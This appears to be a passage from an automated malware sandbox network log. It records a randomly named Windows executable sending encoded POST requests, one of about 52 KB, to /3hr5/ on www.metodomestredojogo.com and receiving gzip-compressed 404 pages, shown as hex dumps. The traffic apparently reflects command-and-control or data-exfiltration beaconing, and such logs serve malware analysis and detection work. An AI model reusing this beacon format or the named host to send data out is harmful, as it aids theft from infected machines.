                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f 5e 3c df 67 d6 c5 ef 49 37 c0 ef a8 3f d8 39 b7 77 ce bd 9d 33
                                                                                                                              Data Ascii: RrG}} A,o1Z9$9r0"U}mV7n$-Js9{,s !d;G20D)U`sC")f,0]Q"8+9e*\|?*SUa0>[ZaxJ|$o@O?DUJN],;S1p8&LDqE1f%l,/dWPn@jpb9g5L_i"dbSELE^({!OO<PX}bRAo]:R,7Gs&b9.9dcH4kgB53Z|?[}\G,]/?Nz/^,~XXvUC<,TAe^<wx[K]b81]3PB92M_Z& @!xLO-7XK4gT-8]IQuRHReK|0'c7FT4ql{8(Ml$Qjnn6y1,5"U4V;3aIX&pj704O,_0_xrD1-5n<(9S(AhecWyzx~54kY1;BG9SNg*mE<D=v>Sv*LJk|nO?UMv/^<gI7?9w3
                                                                                                                              Dec 4, 2023 15:23:40.651396990 CET1340INData Raw: d4 e7 0f f6 26 e9 6e e0 77 92 f7 22 ed 3b 91 de 9d 08 3c dc 07 a1 9b a7 e5 0a 20 93 97 6c bd 83 9d 49 2d 67 98 86 3b f4 26 eb 4d 6c 5e db 3b af 9b 59 0e 15 4e 0e 16 36 6f 56 e8 e1 d6 31 d3 b5 63 66 54 11 35 76 0a 81 65 4c 40 ec 3c 1f 9b 65 0e 72
                                                                                                                              Data Ascii: &nw";< lI-g;&Ml^;YN6oV1cfT5veL@<erJ!rBH>%LhCETRNuN^1kp2iXyWRXC;vZs;~/0/GfKyC9;FNzS; v Urlt< )5Z44hP
                                                                                                                              Dec 4, 2023 15:23:40.651437044 CET1340INData Raw: 45 93 94 a1 d0 eb 74 3a 9b d8 e9 54 0a e3 6a f6 07 8c 42 2f 6c f7 20 bb d9 b2 b6 93 5d 5c 54 dc af 77 d6 bf 26 b9 33 48 1d 95 dd cd 6f 95 4d b8 9c a0 d3 ea 24 9d c8 78 79 ed ba 88 ef e6 0a 34 18 b7 52 c5 45 3e 88 3e 22 df 04 e5 e7 b4 36 27 5a 52
                                                                                                                              Data Ascii: Et:TjB/l ]\Tw&3HoM$xy4RE>>"6'ZR(t:N}<e0gZ~srqg6o0>of,vM<^eW(H*CclD%,Ij JU0}0I> {DYm!}wIsz2?#6fZME#b
                                                                                                                              Dec 4, 2023 15:23:40.651494026 CET1340INData Raw: 0f dc 03 50 76 a8 e9 bc 9e 83 e9 14 57 40 97 4f 02 d9 6f 56 83 37 4f 99 81 27 81 94 1d 0e 79 24 67 e2 69 3a 6d ba 1c dc ab 82 f8 49 08 9b 2e 35 08 bc c8 98 90 c5 1a 4a 2a 2a 92 a7 a9 55 db f1 61 64 9a 4d 40 7d 49 e0 b2 61 1d 2e 4b 52 83 66 01 10
                                                                                                                              Data Ascii: PvW@OoV7O'y$gi:mI.5J**UadM@}Ia.KRf+<s~!f\Yil_lAP9PUVDjsqYYq=)..?~y|Vr&>OMm*?3/2&dT0"&X4Xsqr
                                                                                                                              Dec 4, 2023 15:23:40.651530981 CET1340INData Raw: 43 bb b6 c8 84 cb e8 ea 02 ed 8e 34 d6 4d d7 9d 6c 57 96 d1 04 d6 dd 6e f1 39 25 98 6c 30 8a 6c 2d 62 ae b0 e3 05 8e 9c ca d8 85 85 01 85 98 2d 92 48 99 70 b8 98 e2 d0 2e 08 3a e1 10 b7 88 bd 5d c4 4c e7 9c 2e 5d 3d a7 b9 73 7e f4 ec d9 b3 5d c1
                                                                                                                              Data Ascii: C4MlWn9%l0l-b-Hp.:]L.]=s~]L-*}k7_v0vC?R2!vmr8Dzj_:<i/*oE_0XEe,*~`~vbS1Nd$GPJn%mu#Vhp7)-\
                                                                                                                              Dec 4, 2023 15:23:40.651565075 CET530INData Raw: 18 b4 36 65 22 b1 41 aa 14 24 54 c4 d2 f3 3c e7 a6 55 8e 74 81 53 08 cd a9 81 0b 83 23 d9 e6 0a 7e 2f 70 9d f1 2a e0 7c 2c 82 00 4e 48 91 91 88 66 b9 24 72 82 56 a0 c6 86 a7 1d c5 a4 e5 25 66 28 c0 a6 e2 47 31 2b 8b 42 8c d9 e7 09 e3 1c 39 ac 9f
                                                                                                                              Data Ascii: 6e"A$T<UtS#~/p*|,NHf$rV%f(G1+B9P>k1+{Nl_DkyNAe*0l\ mfPxYPmC8D%F38M{[HCcR%aAB:SZpsq+V1(3t*'/*S{;U^)


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.11.2050145108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:43.041182995 CET1171OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 45 5a 76 46 43 6a 70 56 61 78 45 7a 4f 66 63 6d 4c 47 4b 6d 50 7a 4e 58 2b 4a 57 6f 59 32 39 56 48 44 31 44 44 45 58 73 7a 2b 42 4f 61 42 61 57 38 65 4e 4f 74 58 69 65 51 48 44 31 58 42 66 44 53 75 37 6d 34 6b 34 50 31 73 74 49 75 53 4a 42 4c 4d 72 56 2f 74 36 65 63 50 44 70 59 53 34 6f 48 48 66 31 39 62 36 73 37 4f 44 6b 79 7a 38 41 51 65 58 78 57 6a 74 4f 73 65 74 56 79 75 35 34 61 72 4a 51 52 31 33 57 34 72 34 36 6c 76 7a 7a 4e 49 6f 42 76 6d 5a 71 74 42 55 77 2b 31 34 72 2b 74 53 43 59 56 74 31 35 62 4d 44 54 58 4b 53 74 45 45 75 47 59 4f 33 74 33 33 55 48 2f 5a 49 39 74 51 32 55 51 53 54 7a 68 39 69 4b 61 44 44 34 70 67 4d 7a 49 64 76 49 72 6c 64 62 6a 42 2f 58 4b 38 2f 75 35 76 6f 52 58 55 6c 2f 51 70 4b 68 4c 6b 71 55 72 75 38 32 38 59 46 41 5a 74 36 48 67 79 35 62 53 70 43 37 77 37 4b 69 61 70 41 7a 38 75 6b 54 6c 2b 55 58 4b 69 72 37 45 67 6f 4b 75 5a 33 59 52 74 64 71 30 69 72 42 52 46 58 73 6d 34 5a 4c 30 55 2f 4d 38 46 2b 56 69 58 33 55 69 4b 47 6c 30 35 4b 67 61 54 58 2b 6d 6d 76 68 4e 76 4e 7a 34 4e 52 67 6c 58 52 44 36 75 6f 6c 4b 48 78 35 70 64 43 79 58 58 79 37 49 50 6d 72 53 4d 34 51 4d 6a 63 33 57 45 69 78 70 4d 6c 46 34 78 57 51 5a 66 73 6b 51 44 74 57 66 39 33 69 6d 63 52 39 54 61 71 4f 51 31 76 67 4e 57 48 36 79 36 59 66 45 6c 46 54 30 77 67 57 52 66 57 2b 4a 71 64 30 2b 73 4f 65 33 6a 64 32 4d 6e 77 2b 34 44 35 76 63 49 72 5a 77 4f 67 6e 5a 43 4f 64 67 47 39 4e 64 2b 6c 4d 51 32 6e 74 36 2b 42 6c 4c 38 4a 31 69 67 44 36 75 4c 2f 58 55 43 2f 49 49 53 64 34 69 47 67 55 7a 6e 64 43 77 72 2b 6d 64 71 7a 78 42 4d 3d
                                                                                                                              Data Ascii: TZd=EZvFCjpVaxEzOfcmLGKmPzNX+JWoY29VHD1DDEXsz+BOaBaW8eNOtXieQHD1XBfDSu7m4k4P1stIuSJBLMrV/t6ecPDpYS4oHHf19b6s7ODkyz8AQeXxWjtOsetVyu54arJQR13W4r46lvzzNIoBvmZqtBUw+14r+tSCYVt15bMDTXKStEEuGYO3t33UH/ZI9tQ2UQSTzh9iKaDD4pgMzIdvIrldbjB/XK8/u5voRXUl/QpKhLkqUru828YFAZt6Hgy5bSpC7w7KiapAz8ukTl+UXKir7EgoKuZ3YRtdq0irBRFXsm4ZL0U/M8F+ViX3UiKGl05KgaTX+mmvhNvNz4NRglXRD6uolKHx5pdCyXXy7IPmrSM4QMjc3WEixpMlF4xWQZfskQDtWf93imcR9TaqOQ1vgNWH6y6YfElFT0wgWRfW+Jqd0+sOe3jd2Mnw+4D5vcIrZwOgnZCOdgG9Nd+lMQ2nt6+BlL8J1igD6uL/XUC/IISd4iGgUzndCwr+mdqzxBM=
                                                                                                                              Dec 4, 2023 15:23:43.289043903 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:43 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f 5e 3c df 67 d6 c5 ef 49 37 c0 ef a8 3f d8 39 b7 77 ce bd 9d 33
                                                                                                                              Data Ascii: RrG}} A,o1Z9$9r0"U}mV7n$-Js9{,s !d;G20D)U`sC")f,0]Q"8+9e*\|?*SUa0>[ZaxJ|$o@O?DUJN],;S1p8&LDqE1f%l,/dWPn@jpb9g5L_i"dbSELE^({!OO<PX}bRAo]:R,7Gs&b9.9dcH4kgB53Z|?[}\G,]/?Nz/^,~XXvUC<,TAe^<wx[K]b81]3PB92M_Z& @!xLO-7XK4gT-8]IQuRHReK|0'c7FT4ql{8(Ml$Qjnn6y1,5"U4V;3aIX&pj704O,_0_xrD1-5n<(9S(AhecWyzx~54kY1;BG9SNg*mE<D=v>Sv*LJk|nO?UMv/^<gI7?9w3
                                                                                                                              Dec 4, 2023 15:23:43.289118052 CET1340INData Raw: d4 e7 0f f6 26 e9 6e e0 77 92 f7 22 ed 3b 91 de 9d 08 3c dc 07 a1 9b a7 e5 0a 20 93 97 6c bd 83 9d 49 2d 67 98 86 3b f4 26 eb 4d 6c 5e db 3b af 9b 59 0e 15 4e 0e 16 36 6f 56 e8 e1 d6 31 d3 b5 63 66 54 11 35 76 0a 81 65 4c 40 ec 3c 1f 9b 65 0e 72
                                                                                                                              Data Ascii: &nw";< lI-g;&Ml^;YN6oV1cfT5veL@<erJ!rBH>%LhCETRNuN^1kp2iXyWRXC;vZs;~/0/GfKyC9;FNzS; v Urlt< )5Z44hP
                                                                                                                              Dec 4, 2023 15:23:43.289180994 CET1340INData Raw: 45 93 94 a1 d0 eb 74 3a 9b d8 e9 54 0a e3 6a f6 07 8c 42 2f 6c f7 20 bb d9 b2 b6 93 5d 5c 54 dc af 77 d6 bf 26 b9 33 48 1d 95 dd cd 6f 95 4d b8 9c a0 d3 ea 24 9d c8 78 79 ed ba 88 ef e6 0a 34 18 b7 52 c5 45 3e 88 3e 22 df 04 e5 e7 b4 36 27 5a 52
                                                                                                                              Data Ascii: Et:TjB/l ]\Tw&3HoM$xy4RE>>"6'ZR(t:N}<e0gZ~srqg6o0>of,vM<^eW(H*CclD%,Ij JU0}0I> {DYm!}wIsz2?#6fZME#b
                                                                                                                              Dec 4, 2023 15:23:43.289237976 CET1340INData Raw: 0f dc 03 50 76 a8 e9 bc 9e 83 e9 14 57 40 97 4f 02 d9 6f 56 83 37 4f 99 81 27 81 94 1d 0e 79 24 67 e2 69 3a 6d ba 1c dc ab 82 f8 49 08 9b 2e 35 08 bc c8 98 90 c5 1a 4a 2a 2a 92 a7 a9 55 db f1 61 64 9a 4d 40 7d 49 e0 b2 61 1d 2e 4b 52 83 66 01 10
                                                                                                                              Data Ascii: PvW@OoV7O'y$gi:mI.5J**UadM@}Ia.KRf+<s~!f\Yil_lAP9PUVDjsqYYq=)..?~y|Vr&>OMm*?3/2&dT0"&X4Xsqr
                                                                                                                              Dec 4, 2023 15:23:43.289287090 CET1340INData Raw: 43 bb b6 c8 84 cb e8 ea 02 ed 8e 34 d6 4d d7 9d 6c 57 96 d1 04 d6 dd 6e f1 39 25 98 6c 30 8a 6c 2d 62 ae b0 e3 05 8e 9c ca d8 85 85 01 85 98 2d 92 48 99 70 b8 98 e2 d0 2e 08 3a e1 10 b7 88 bd 5d c4 4c e7 9c 2e 5d 3d a7 b9 73 7e f4 ec d9 b3 5d c1
                                                                                                                              Data Ascii: C4MlWn9%l0l-b-Hp.:]L.]=s~]L-*}k7_v0vC?R2!vmr8Dzj_:<i/*oE_0XEe,*~`~vbS1Nd$GPJn%mu#Vhp7)-\
                                                                                                                              Dec 4, 2023 15:23:43.289328098 CET530INData Raw: 18 b4 36 65 22 b1 41 aa 14 24 54 c4 d2 f3 3c e7 a6 55 8e 74 81 53 08 cd a9 81 0b 83 23 d9 e6 0a 7e 2f 70 9d f1 2a e0 7c 2c 82 00 4e 48 91 91 88 66 b9 24 72 82 56 a0 c6 86 a7 1d c5 a4 e5 25 66 28 c0 a6 e2 47 31 2b 8b 42 8c d9 e7 09 e3 1c 39 ac 9f
                                                                                                                              Data Ascii: 6e"A$T<UtS#~/p*|,NHf$rV%f(G1+B9P>k1+{Nl_DkyNAe*0l\ mfPxYPmC8D%F38M{[HCcR%aAB:SZpsq+V1(3t*'/*S{;U^)


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.11.2050146108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:45.682343006 CET6484OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 45 5a 76 46 43 6a 70 56 61 78 45 7a 4f 66 63 6d 4c 47 4b 6d 50 7a 4e 58 2b 4a 57 6f 59 32 39 56 48 44 31 44 44 45 58 73 7a 2b 4a 4f 61 55 57 57 39 39 6c 4f 75 58 69 65 5a 6e 44 32 58 42 65 66 53 75 6a 69 34 6b 31 30 31 71 68 49 74 42 42 42 4c 2b 54 56 75 64 36 66 54 76 44 76 54 79 35 76 48 48 54 70 39 62 75 38 37 2f 48 6b 7a 7a 73 41 62 50 58 32 65 54 74 4d 73 65 74 6e 6b 65 35 4b 61 72 4d 4e 52 31 37 57 34 6f 4d 36 72 39 37 7a 65 76 45 42 6f 32 5a 70 6e 68 55 42 6c 46 34 53 2b 74 47 77 59 56 74 6c 35 61 59 44 54 51 2b 53 73 46 45 74 47 34 4f 33 67 58 33 58 4e 76 46 45 39 74 64 78 55 54 4f 54 7a 69 39 69 59 71 44 44 6f 59 67 50 30 6f 64 74 5a 37 6b 48 66 6a 4e 6e 58 4f 55 46 75 39 33 6f 51 6e 51 6c 2b 6e 46 4b 6e 61 6b 71 64 72 75 2b 35 63 59 57 5a 4a 74 6d 48 67 69 6c 62 53 4a 6f 37 33 44 4b 6a 37 4a 41 6c 39 75 6e 44 31 2b 4f 4f 36 6a 68 70 30 6b 30 4b 74 68 7a 59 52 73 51 71 32 4f 72 42 41 56 58 74 69 4d 65 4d 6b 55 43 47 73 46 72 66 43 62 48 55 69 6e 46 6c 31 78 67 67 5a 2f 58 2b 47 6d 76 78 38 76 43 35 49 4e 6f 76 46 58 44 4d 61 76 75 6c 4b 62 54 35 74 4e 38 78 6a 66 79 36 34 66 6d 76 43 4d 35 62 4d 6a 59 69 47 45 65 67 35 4d 6c 46 34 39 43 51 5a 54 73 6e 68 37 74 58 6f 52 33 77 6c 45 52 37 54 62 68 4f 51 30 78 67 4d 71 30 36 79 79 32 66 45 55 6f 54 32 38 67 56 44 6e 57 39 49 71 53 6b 2b 73 48 49 48 69 45 72 38 72 6a 2b 34 66 68 76 63 34 37 5a 48 65 67 6d 59 79 4f 4c 51 48 72 62 74 2b 69 4c 51 33 75 37 36 44 43 6c 4c 49 2f 31 6a 6b 54 36 74 37 2f 61 69 4c 33 4d 36 4f 71 6e 44 4f 4f 58 6e 44 57 45 67 33 79 79 38 6a 77 74 32 59 6c 48 74 4c 79 35 4e 58 69 62 52 50 77 43 39 74 66 41 67 66 52 79 35 64 6d 74 76 69 4d 78 48 69 37 68 4a 59 30 53 43 4a 45 76 75 68 63 6c 4d 77 56 31 35 5a 65 6a 53 55 71 4d 4b 34 39 63 77 43 2b 4b 46 61 4a 44 32 51 51 41 33 59 51 70 4a 5a 64 39 4a 34 6d 76 62 54 56 7a 33 54 4d 55 69 58 73 57 54 35 52 79 39 41 75 70 52 6c 4d 46 2b 44 5a 33 67 32 32 59 31 73 59 4a 35 6f 6e 50 63 7a 68 77 31 77 32 43 67 39 39 39 78 33 70 30 48 2f 6f 42 4f 61 76 42 4c 2f 75 51 43 45 63 33 59 4c 70 39 6d 31 4d 4c 31 70 77 36 6b 55 32 48 72 47 41 38 56 50 4e 42 34 4a 66 51 46 30 5a 2b 45 76 39 55 32 70 54 49 48 35 69 53 32 6a 74 56 4f 64 49 39 7a 32 4e 39 48 4d 43 53 72 5a 32 73 54 6d 2f 77 2f 33 66 77 79 33 45 4b 53 52 58 48 4b 66 62 32 46 38 62 54 6b 4c 2b 61 77 52 39 41 4b 38 49 41 76 41 76 41 41 70 53 4f 79 57 50 5a 4e 59 57 6c 34 4c 2f 61 43 39 47 76 62 57 30 33 76 36 6d 38 33 44 34 6a 30 34 34 36 58 78 70 6e 46 50 6f 44 35 4e 4b 41 78 58 36 2b 46 38 33 51 52 68 39 7a 58 49 51 59 6d 65 67 78 35 2b 79 64 30 5a 64 62 6a 77 37 42 6b 32 6a 52 34 2f 73 59 57 61 7a 46 75 64 36 55 58 70 38 5a 77 2f 35 46 4a 4d 6e 4b 5a 33 66 35 70 33 73 48 6f 75 70 58 6a 2f 6b 50 34 59 34 31 73 71 6e 47 52 34 33 32 54 74 55 34 31 50 39 2b 2b 32 33 67 64 73 31 5a 54 5a 49 47 69 54 4c 42 50 46 5a 67 66 70 7a 4c 32 31 52 78 6d 35 74 58 54 36 59 68 78 61 65 2f 53 57 70 4e 65 47 44 66 44 66 49 6a 30 46 75 32 52 39 68 67 6f 50 77 55 6f 6a 49 54 45 4d 4a 61 4e 76 4a 6d 66 4f 53 77 71 53 73 66 2f 6d 37 69 4a 64 44 39 42 67 65 77 36 58 78 69 30 4c 37 70 55 6d 56 55 66 41 36 2f 61 36 6d 4e 46 4e 6e 65 65 42 65 45 51 6f 4f 4f 4f 6b 32 71 41 71 49 4b 4d 48 63 4e 66 38 77 4d 59 39 63 78 50 30 7a 58 45 65 69 65 38 4f 32 4b 35 79 43 72 50 4c 48 4b 62 47 66 4a 7a 41 32 4b 76 4f 4a 64 36 47 37 4a 76 43 33 59 35 4b 71 48 58 48 36 6d 53 53 71 79 4f 4c 76 7a 41 5a 6e 7a 34 75 6c 65 73 32 6c 44 44 51 6d 58 44 61 51 61 55 49 32 4e 62 68 65 42 55 72 79 6c 47 70 6c 68 4d 56 33 4a 5a 45 37 57 67 48 5a 31 6f 50 38 2b 5a 44 64 32 69 6b 66 58 5a 4d 6f 63 30 65 72 6f 6d 71 6d 37 52 36 33 38 4c 78 34 67 76 77 35 46 73 6a 76 71 51 31 67 52 52 6f 35 70 4a 6b 51 61 61 61 61 59 57 66 65 63 46 75 72 4d 4c 42 76 41 6c 71 78 6b 5a 6f 71 46 65 6f 48 4f 39 47 2b 4d 52 44 45 72 39 53 69 44 4b 70 47 30 4a 50 51 42 6e 53 48 5a 45 50 30 72 77 77 43 6d 42 53 79 72 54 46 6f 72 79 66 48 45 47 4d 30 45 59 56 2b 73 51 42 69 53 30 78 6e 43 72 35 68 55 58 72 32 70 2b 59 54 30 71 4e 42 69 4b 6f 75 56 47 6d 30 67 58 44 48 34 42 31 69 6f 6f 6b 61 75 6e 31 5a 70 76 32
